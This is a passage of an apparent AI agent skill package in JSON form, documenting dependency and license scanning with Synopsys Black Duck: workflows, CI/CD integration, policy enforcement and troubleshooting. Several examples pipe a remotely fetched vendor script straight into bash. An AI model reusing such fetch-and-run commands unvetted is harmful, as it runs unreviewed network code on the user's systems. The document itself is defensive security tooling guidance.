\" - BSD-3-Clause: 12 dependencies\"\n ]\n }\n ],\n \"best_practices\": [\n \"Run Black Duck scans on every pull request to catch new vulnerabilities before merge\",\n \"Configure policy to fail builds on critical and high severity findings\",\n \"Generate and archive SBOMs for every release for supply chain transparency\"\n ],\n \"anti_patterns\": [\n \"Ignoring low severity vulnerabilities without assessment - they can escalate\",\n \"Using latest dependency versions without scanning first - may introduce risks\",\n \"Skipping scans in CI/CD for faster builds - increases deployment risk\"\n ],\n \"faq\": [\n {\n \"question\": \"What Black Duck subscription is required?\",\n \"answer\": \"Requires Black Duck on-premise or hosted subscription with API access. Contact Synopsys for pricing.\"\n },\n {\n \"question\": \"What programming languages are supported?\",\n \"answer\": \"Supports all major languages: JavaScript, Python, Java, Go, Ruby, .NET, PHP, Rust, C/C++, and Docker containers.\"\n },\n {\n \"question\": \"How are credentials secured?\",\n \"answer\": \"API tokens must be set as environment variables (BLACKDUCK_URL, BLACKDUCK_TOKEN) in CI/CD secrets, never in code.\"\n },\n {\n \"question\": \"Does this replace SAST tools?\",\n \"answer\": \"No. Black Duck SCA analyzes dependencies. Use SAST tools like Semgrep or CodeQL for application code security.\"\n },\n {\n \"question\": \"What happens to cached results?\",\n \"answer\": \"Temporary files are cleaned up by default. Configure cleanup settings to retain results for compliance if needed.\"\n },\n {\n \"question\": \"How does it compare to free tools?\",\n \"answer\": \"Black Duck provides comprehensive vulnerability database, license compliance, and enterprise features. Free alternatives include OWASP Dependency-Check.\"\n }\n ]\n },\n \"file_structure\": [\n {\n \"name\": \"assets\",\n \"type\": \"dir\",\n \"path\": \"assets\",\n \"children\": [\n {\n \"name\": \"ci_integration\",\n \"type\": \"dir\",\n \"path\": \"assets/ci_integration\",\n \"children\": [\n {\n \"name\": \"github_actions.yml\",\n \"type\": \"file\",\n \"path\": \"assets/ci_integration/github_actions.yml\",\n \"lines\": 152\n },\n {\n \"name\": \"gitlab_ci.yml\",\n \"type\": \"file\",\n \"path\": \"assets/ci_integration/gitlab_ci.yml\",\n \"lines\": 192\n },\n {\n \"name\": \"jenkins_pipeline.groovy\",\n \"type\": \"file\",\n \"path\": \"assets/ci_integration/jenkins_pipeline.groovy\",\n \"lines\": 311\n }\n ]\n },\n {\n \"name\": \"policy_templates\",\n \"type\": \"dir\",\n \"path\": \"assets/policy_templates\",\n \"children\": [\n {\n \"name\": \"security_policy.json\",\n \"type\": \"file\",\n \"path\": \"assets/policy_templates/security_policy.json\",\n \"lines\": 183\n }\n ]\n },\n {\n \"name\": \"blackduck_config.yml\",\n \"type\": \"file\",\n \"path\": \"assets/blackduck_config.yml\",\n \"lines\": 214\n },\n {\n \"name\": \"ci-config-template.yml\",\n \"type\": \"file\",\n \"path\": \"assets/ci-config-template.yml\",\n \"lines\": 358\n },\n {\n \"name\": \"rule-template.yaml\",\n \"type\": \"file\",\n \"path\": \"assets/rule-template.yaml\",\n \"lines\": 356\n }\n ]\n },\n {\n \"name\": \"references\",\n \"type\": \"dir\",\n \"path\": \"references\",\n \"children\": [\n {\n \"name\": \"cve_cwe_owasp_mapping.md\",\n \"type\": \"file\",\n \"path\": \"references/cve_cwe_owasp_mapping.md\",\n \"lines\": 349\n },\n {\n \"name\": \"EXAMPLE.md\",\n \"type\": \"file\",\n \"path\": \"references/EXAMPLE.md\",\n \"lines\": 551\n },\n {\n \"name\": \"license_risk_guide.md\",\n \"type\": \"file\",\n \"path\": \"references/license_risk_guide.md\",\n \"lines\": 473\n },\n {\n \"name\": \"remediation_strategies.md\",\n \"type\": \"file\",\n \"path\": \"references/remediation_strategies.md\",\n \"lines\": 497\n },\n {\n \"name\": \"supply_chain_threats.md\",\n \"type\": \"file\",\n \"path\": \"references/supply_chain_threats.md\",\n \"lines\": 589\n },\n {\n \"name\": \"WORKFLOW_CHECKLIST.md\",\n \"type\": \"file\",\n \"path\": \"references/WORKFLOW_CHECKLIST.md\",\n \"lines\": 254\n }\n ]\n },\n {\n \"name\": \"SKILL.md\",\n \"type\": \"file\",\n \"path\": \"SKILL.md\",\n \"lines\": 392\n }\n ]\n}\n","content_type":"application/json; charset=utf-8","language":"json","size":13114,"content_sha256":"1a9e2bdcfe95d0526c3ff5aa16fe67468b94bb9040e21bdd010b06f22551a0f2"}],"content_json":{"type":"doc","content":[{"type":"heading","attrs":{"level":1},"content":[{"text":"Software Composition Analysis with Black Duck","type":"text"}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Overview","type":"text"}]},{"type":"paragraph","content":[{"text":"Perform comprehensive Software Composition Analysis (SCA) using Synopsys Black Duck to identify security vulnerabilities, license compliance risks, and supply chain threats in open source dependencies. This skill provides automated dependency scanning, vulnerability detection with CVE mapping, license risk analysis, and remediation guidance aligned with OWASP and NIST standards.","type":"text"}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Quick Start","type":"text"}]},{"type":"paragraph","content":[{"text":"Scan a project for dependency vulnerabilities:","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Using Black Duck Detect (recommended)\nbash \u003c(curl -s -L https://detect.synopsys.com/detect.sh) \\\n --blackduck.url=$BLACKDUCK_URL \\\n --blackduck.api.token=$BLACKDUCK_TOKEN \\\n --detect.project.name=\"MyProject\" \\\n --detect.project.version.name=\"1.0.0\"","type":"text"}]},{"type":"paragraph","content":[{"text":"Scan with policy violation enforcement:","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Fail build on policy violations\nbash \u003c(curl -s -L https://detect.synopsys.com/detect.sh) \\\n --blackduck.url=$BLACKDUCK_URL \\\n --blackduck.api.token=$BLACKDUCK_TOKEN \\\n --detect.policy.check.fail.on.severities=BLOCKER,CRITICAL","type":"text"}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Core Workflows","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Workflow 1: Initial Dependency Security Assessment","type":"text"}]},{"type":"paragraph","content":[{"text":"Progress: [ ] 1. Identify package managers and dependency manifests in codebase [ ] 2. Run ","type":"text"},{"text":"scripts/blackduck_scan.py","type":"text","marks":[{"type":"code_inline"}]},{"text":" with project detection [ ] 3. Analyze vulnerability findings categorized by severity (CRITICAL, HIGH, MEDIUM, LOW) [ ] 4. Map CVE findings to CWE and OWASP Top 10 categories [ ] 5. Review license compliance risks and policy violations [ ] 6. Generate prioritized remediation report with upgrade recommendations","type":"text"}]},{"type":"paragraph","content":[{"text":"Work through each step systematically. Check off completed items.","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Workflow 2: Vulnerability Remediation","type":"text"}]},{"type":"ordered_list","attrs":{"order":1,"listStyle":"number"},"content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Review scan results and identify critical/high severity vulnerabilities","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"For each vulnerability:","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Check if fixed version is available","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Review breaking changes in upgrade path","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Consult ","type":"text"},{"text":"references/remediation_strategies.md","type":"text","marks":[{"type":"code_inline"}]},{"text":" for vulnerability-specific guidance","type":"text"}]}]}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Apply dependency updates using package manager","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Re-scan to validate fixes","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Document any vulnerabilities accepted as risk with justification","type":"text"}]}]}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Workflow 3: License Compliance Analysis","type":"text"}]},{"type":"ordered_list","attrs":{"order":1,"listStyle":"number"},"content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Run Black Duck scan with license risk detection enabled","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Review components flagged with license compliance issues","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Categorize by risk level:","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"High Risk","type":"text","marks":[{"type":"strong"}]},{"text":": GPL, AGPL (copyleft licenses)","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Medium Risk","type":"text","marks":[{"type":"strong"}]},{"text":": LGPL, MPL (weak copyleft)","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Low Risk","type":"text","marks":[{"type":"strong"}]},{"text":": Apache, MIT, BSD (permissive)","type":"text"}]}]}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Consult legal team for high-risk license violations","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Document license decisions and create policy exceptions if approved","type":"text"}]}]}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Workflow 4: CI/CD Integration","type":"text"}]},{"type":"ordered_list","attrs":{"order":1,"listStyle":"number"},"content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Add Black Duck Detect to CI/CD pipeline using ","type":"text"},{"text":"assets/ci_integration/","type":"text","marks":[{"type":"code_inline"}]}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Configure environment variables for Black Duck URL and API token","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Set policy thresholds (fail on CRITICAL/HIGH vulnerabilities)","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Enable SBOM generation for supply chain transparency","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Configure alerts for new vulnerabilities in production dependencies","type":"text"}]}]}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Workflow 5: Supply Chain Risk Assessment","type":"text"}]},{"type":"ordered_list","attrs":{"order":1,"listStyle":"number"},"content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Identify direct and transitive dependencies","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Analyze component quality metrics:","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Maintenance activity (last update, commit frequency)","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Community health (contributors, issue resolution)","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Security track record (historical CVEs)","type":"text"}]}]}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Flag high-risk components (unmaintained, few maintainers, security issues)","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Review alternative components with better security posture","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Document supply chain risks and mitigation strategies","type":"text"}]}]}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Security Considerations","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Sensitive Data Handling","type":"text","marks":[{"type":"strong"}]},{"text":": Black Duck scans require API tokens with read/write access. Store credentials securely in secrets management (Vault, AWS Secrets Manager). Never commit tokens to version control.","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Access Control","type":"text","marks":[{"type":"strong"}]},{"text":": Limit Black Duck access to authorized security and development teams. Use role-based access control (RBAC) for scan result visibility and policy management.","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Audit Logging","type":"text","marks":[{"type":"strong"}]},{"text":": Log all scan executions with timestamps, user, project version, and findings count for compliance auditing. Enable Black Duck's built-in audit trail.","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Compliance","type":"text","marks":[{"type":"strong"}]},{"text":": SCA scanning supports SOC2, PCI-DSS, GDPR, and HIPAA compliance by tracking third-party component risks. Generate SBOM for regulatory requirements.","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Safe Defaults","type":"text","marks":[{"type":"strong"}]},{"text":": Configure policies to fail builds on CRITICAL and HIGH severity vulnerabilities. Use allowlists sparingly with documented business justification.","type":"text"}]}]}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Supported Package Managers","type":"text"}]},{"type":"paragraph","content":[{"text":"Black Duck Detect automatically identifies and scans:","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"JavaScript/Node","type":"text","marks":[{"type":"strong"}]},{"text":": npm, yarn, pnpm","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Python","type":"text","marks":[{"type":"strong"}]},{"text":": pip, pipenv, poetry","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Java","type":"text","marks":[{"type":"strong"}]},{"text":": Maven, Gradle","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Ruby","type":"text","marks":[{"type":"strong"}]},{"text":": Bundler, gem","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":".NET","type":"text","marks":[{"type":"strong"}]},{"text":": NuGet","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Go","type":"text","marks":[{"type":"strong"}]},{"text":": go modules","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"PHP","type":"text","marks":[{"type":"strong"}]},{"text":": Composer","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Rust","type":"text","marks":[{"type":"strong"}]},{"text":": Cargo","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"C/C++","type":"text","marks":[{"type":"strong"}]},{"text":": Conan, vcpkg","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Docker","type":"text","marks":[{"type":"strong"}]},{"text":": Container image layers","type":"text"}]}]}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Bundled Resources","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Scripts","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"scripts/blackduck_scan.py","type":"text","marks":[{"type":"code_inline"}]},{"text":" - Full-featured scanning with CVE/CWE mapping and reporting","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"scripts/analyze_results.py","type":"text","marks":[{"type":"code_inline"}]},{"text":" - Parse Black Duck results and generate remediation report","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"scripts/sbom_generator.sh","type":"text","marks":[{"type":"code_inline"}]},{"text":" - Generate SBOM (CycloneDX/SPDX) from scan results","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"scripts/policy_checker.py","type":"text","marks":[{"type":"code_inline"}]},{"text":" - Validate compliance with organizational security policies","type":"text"}]}]}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"References","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"references/cve_cwe_owasp_mapping.md","type":"text","marks":[{"type":"code_inline"}]},{"text":" - CVE to CWE and OWASP Top 10 mapping","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"references/remediation_strategies.md","type":"text","marks":[{"type":"code_inline"}]},{"text":" - Vulnerability remediation patterns and upgrade strategies","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"references/license_risk_guide.md","type":"text","marks":[{"type":"code_inline"}]},{"text":" - License compliance risk assessment and legal guidance","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"references/supply_chain_threats.md","type":"text","marks":[{"type":"code_inline"}]},{"text":" - Common supply chain attack patterns and mitigations","type":"text"}]}]}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Assets","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"assets/ci_integration/github_actions.yml","type":"text","marks":[{"type":"code_inline"}]},{"text":" - GitHub Actions workflow for Black Duck scanning","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"assets/ci_integration/gitlab_ci.yml","type":"text","marks":[{"type":"code_inline"}]},{"text":" - GitLab CI configuration for SCA","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"assets/ci_integration/jenkins_pipeline.groovy","type":"text","marks":[{"type":"code_inline"}]},{"text":" - Jenkins pipeline with Black Duck integration","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"assets/policy_templates/","type":"text","marks":[{"type":"code_inline"}]},{"text":" - Pre-configured security and compliance policies","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"assets/blackduck_config.yml","type":"text","marks":[{"type":"code_inline"}]},{"text":" - Recommended Black Duck Detect configuration","type":"text"}]}]}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Common Patterns","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Pattern 1: Daily Dependency Security Baseline","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Run comprehensive scan and generate SBOM\nscripts/blackduck_scan.py \\\n --project \"MyApp\" \\\n --version \"1.0.0\" \\\n --output results.json \\\n --generate-sbom \\\n --severity CRITICAL HIGH","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Pattern 2: Pull Request Dependency Gate","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Scan PR changes, fail on new high-severity vulnerabilities\nbash \u003c(curl -s -L https://detect.synopsys.com/detect.sh) \\\n --blackduck.url=$BLACKDUCK_URL \\\n --blackduck.api.token=$BLACKDUCK_TOKEN \\\n --detect.policy.check.fail.on.severities=CRITICAL,HIGH \\\n --detect.wait.for.results=true","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Pattern 3: License Compliance Audit","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Generate license compliance report\nscripts/blackduck_scan.py \\\n --project \"MyApp\" \\\n --version \"1.0.0\" \\\n --report-type license \\\n --output license-report.pdf","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Pattern 4: Vulnerability Research and Triage","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Extract CVE details and remediation guidance\nscripts/analyze_results.py \\\n --input scan-results.json \\\n --filter-severity CRITICAL HIGH \\\n --include-remediation \\\n --output vulnerability-report.md","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Pattern 5: SBOM Generation for Compliance","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Generate Software Bill of Materials (CycloneDX format)\nscripts/sbom_generator.sh \\\n --project \"MyApp\" \\\n --version \"1.0.0\" \\\n --format cyclonedx \\\n --output sbom.json","type":"text"}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Integration Points","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"CI/CD Integration","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"GitHub Actions","type":"text","marks":[{"type":"strong"}]},{"text":": Use ","type":"text"},{"text":"synopsys-sig/detect-action@v1","type":"text","marks":[{"type":"code_inline"}]},{"text":" with policy enforcement","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"GitLab CI","type":"text","marks":[{"type":"strong"}]},{"text":": Run as security scanning job with dependency scanning template","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Jenkins","type":"text","marks":[{"type":"strong"}]},{"text":": Execute Detect as pipeline step with quality gates","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Azure DevOps","type":"text","marks":[{"type":"strong"}]},{"text":": Integrate using Black Duck extension from marketplace","type":"text"}]}]}]},{"type":"paragraph","content":[{"text":"See ","type":"text"},{"text":"assets/ci_integration/","type":"text","marks":[{"type":"code_inline"}]},{"text":" for ready-to-use pipeline configurations.","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Security Tool Integration","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"SIEM/SOAR","type":"text","marks":[{"type":"strong"}]},{"text":": Export findings in JSON/CSV for ingestion into Splunk, ELK","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Vulnerability Management","type":"text","marks":[{"type":"strong"}]},{"text":": Integrate with Jira, ServiceNow, DefectDojo","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Secret Scanning","type":"text","marks":[{"type":"strong"}]},{"text":": Combine with Gitleaks, TruffleHog for comprehensive security","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"SAST Tools","type":"text","marks":[{"type":"strong"}]},{"text":": Use alongside Semgrep, Bandit for defense-in-depth","type":"text"}]}]}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"SDLC Integration","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Requirements Phase","type":"text","marks":[{"type":"strong"}]},{"text":": Define acceptable license and vulnerability policies","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Development","type":"text","marks":[{"type":"strong"}]},{"text":": IDE plugins provide real-time dependency security feedback","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Code Review","type":"text","marks":[{"type":"strong"}]},{"text":": Automated dependency review in PR workflow","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Testing","type":"text","marks":[{"type":"strong"}]},{"text":": Validate security of third-party components","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Deployment","type":"text","marks":[{"type":"strong"}]},{"text":": Final dependency gate before production release","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Operations","type":"text","marks":[{"type":"strong"}]},{"text":": Continuous monitoring for new vulnerabilities in production","type":"text"}]}]}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Severity Classification","type":"text"}]},{"type":"paragraph","content":[{"text":"Black Duck classifies vulnerabilities by CVSS score and severity:","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"CRITICAL","type":"text","marks":[{"type":"strong"}]},{"text":" (CVSS 9.0-10.0): Remotely exploitable with severe impact (RCE, SQLi)","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"HIGH","type":"text","marks":[{"type":"strong"}]},{"text":" (CVSS 7.0-8.9): Significant security risks requiring immediate attention","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"MEDIUM","type":"text","marks":[{"type":"strong"}]},{"text":" (CVSS 4.0-6.9): Moderate security weaknesses needing remediation","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"LOW","type":"text","marks":[{"type":"strong"}]},{"text":" (CVSS 0.1-3.9): Minor security issues or defense-in-depth improvements","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"NONE","type":"text","marks":[{"type":"strong"}]},{"text":" (CVSS 0.0): Informational findings","type":"text"}]}]}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Policy Management","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Creating Security Policies","type":"text"}]},{"type":"ordered_list","attrs":{"order":1,"listStyle":"number"},"content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Define organizational risk thresholds (e.g., fail on CVSS >= 7.0)","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Configure license compliance rules using ","type":"text"},{"text":"assets/policy_templates/","type":"text","marks":[{"type":"code_inline"}]}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Set component usage policies (blocklists for known malicious packages)","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Enable operational risk policies (unmaintained dependencies, age thresholds)","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Document policy exceptions with business justification and expiration dates","type":"text"}]}]}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Policy Enforcement","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Enforce custom policy during scan\nbash \u003c(curl -s -L https://detect.synopsys.com/detect.sh) \\\n --blackduck.url=$BLACKDUCK_URL \\\n --blackduck.api.token=$BLACKDUCK_TOKEN \\\n --detect.policy.check.fail.on.severities=BLOCKER,CRITICAL \\\n --detect.wait.for.results=true","type":"text"}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Performance Optimization","type":"text"}]},{"type":"paragraph","content":[{"text":"For large projects with many dependencies:","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Use intelligent scan mode (incremental)\nbash \u003c(curl -s -L https://detect.synopsys.com/detect.sh) \\\n --detect.detector.search.depth=3 \\\n --detect.blackduck.signature.scanner.snippet.matching=SNIPPET_MATCHING \\\n --detect.parallel.processors=4\n\n# Exclude test and development dependencies\nbash \u003c(curl -s -L https://detect.synopsys.com/detect.sh) \\\n --detect.excluded.detector.types=PIP,NPM_PACKAGE_LOCK \\\n --detect.npm.include.dev.dependencies=false","type":"text"}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Troubleshooting","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Issue: Too Many False Positives","type":"text"}]},{"type":"paragraph","content":[{"text":"Solution","type":"text","marks":[{"type":"strong"}]},{"text":":","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Review vulnerability applicability (is vulnerable code path used?)","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Use vulnerability suppression with documented justification","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Configure component matching precision in Black Duck settings","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Verify component identification accuracy (check for misidentified packages)","type":"text"}]}]}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Issue: License Compliance Violations","type":"text"}]},{"type":"paragraph","content":[{"text":"Solution","type":"text","marks":[{"type":"strong"}]},{"text":":","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Review component licenses in Black Duck dashboard","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Consult ","type":"text"},{"text":"references/license_risk_guide.md","type":"text","marks":[{"type":"code_inline"}]},{"text":" for risk assessment","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Replace high-risk licensed components with permissive alternatives","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Obtain legal approval and document policy exceptions","type":"text"}]}]}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Issue: Scan Not Detecting Dependencies","type":"text"}]},{"type":"paragraph","content":[{"text":"Solution","type":"text","marks":[{"type":"strong"}]},{"text":":","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Verify package manager files are present (package.json, requirements.txt, pom.xml)","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Check Black Duck Detect logs for detector failures","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Ensure dependencies are installed before scanning (run npm install, pip install)","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Use ","type":"text"},{"text":"--detect.detector.search.depth","type":"text","marks":[{"type":"code_inline"}]},{"text":" to increase search depth","type":"text"}]}]}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Issue: Slow Scan Performance","type":"text"}]},{"type":"paragraph","content":[{"text":"Solution","type":"text","marks":[{"type":"strong"}]},{"text":":","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Use snippet matching instead of full file matching","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Increase ","type":"text"},{"text":"--detect.parallel.processors","type":"text","marks":[{"type":"code_inline"}]},{"text":" for multi-core systems","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Exclude test directories and development dependencies","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Use intelligent/rapid scan mode for faster feedback","type":"text"}]}]}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Advanced Usage","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Vulnerability Analysis","type":"text"}]},{"type":"paragraph","content":[{"text":"For detailed vulnerability research, consult ","type":"text"},{"text":"references/remediation_strategies.md","type":"text","marks":[{"type":"code_inline"}]},{"text":".","type":"text"}]},{"type":"paragraph","content":[{"text":"Key remediation strategies:","type":"text"}]},{"type":"ordered_list","attrs":{"order":1,"listStyle":"number"},"content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Upgrade","type":"text","marks":[{"type":"strong"}]},{"text":": Update to fixed version (preferred)","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Patch","type":"text","marks":[{"type":"strong"}]},{"text":": Apply security patch if upgrade not 